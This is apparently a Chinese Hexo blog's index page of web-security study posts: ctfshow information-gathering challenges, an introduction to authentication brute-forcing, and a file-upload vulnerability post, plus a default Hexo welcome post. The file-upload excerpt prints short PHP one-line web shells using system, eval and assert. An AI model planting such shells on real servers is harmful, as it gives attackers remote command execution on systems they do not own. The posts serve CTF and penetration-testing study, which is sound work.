ctfshow信息搜集

发表于 2025-07-22 分类于 WEB 本文字数： 2.3k 阅读时长 ≈ 2 分钟

ctfshow信息搜集

Web1

源代码泄露

Web2

无法查看源代码，有两种方法，一种是直接ctrl+U,另一种是在url前加上**view-source: **

1	view-source:https://25b672e8-95f7-4258-8246-e2fae04f135f.challenge.ctf.show/

Web3

直接抓包

阅读全文 »

认证爆破

发表于 2024-08-23 更新于 2025-07-22 分类于 WEB 本文字数： 4.1k 阅读时长 ≈ 4 分钟

认证爆破

认证技术

身份认证技术是用于在计算机网络中确认操作者身份的一种有效的解决方法。计算机网络世界中一切信息包括用户的身份信息都是用一组特定的数据来表示的，计算机只能识别用户的数字身份，所有对用户的授权也是针对用户数字身份的授权。
身份认证攻击就是为了使用各种办法通过这层认证，突破作为防护网络资产的第一道关口，身份认证攻击在渗透测试中有着举足轻重的作用。
对于身份认证攻击可以直接进行爆破攻击，在配置不当的情况下内网中还会经常遇到非授权访问。

阅读全文 »

文件上传

发表于 2024-08-22 分类于 WEB 本文字数： 5.7k 阅读时长 ≈ 5 分钟

文件上传漏洞

一句话木马

<?php system('whoami');?>
<?php eval('code_str');?>        #php代码块 system('whoami')
<?php system('command')?>        #直接传命令就行，whoami
<?php assert('assertion')?>      #断延，也可以理解为代码块，只适用于php5以下，php7需要用eval

阅读全文 »

指纹识别

发表于 2024-06-22 分类于 WEB 本文字数： 0 阅读时长 ≈ 1 分钟

Hello World

发表于 2024-06-21 更新于 2024-06-22 本文字数： 367 阅读时长 ≈ 1 分钟

Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.

Quick Start

Create a new post

1	$ hexo new "My New Post"

More info: Writing

Run server

1	$ hexo server

More info: Server

阅读全文 »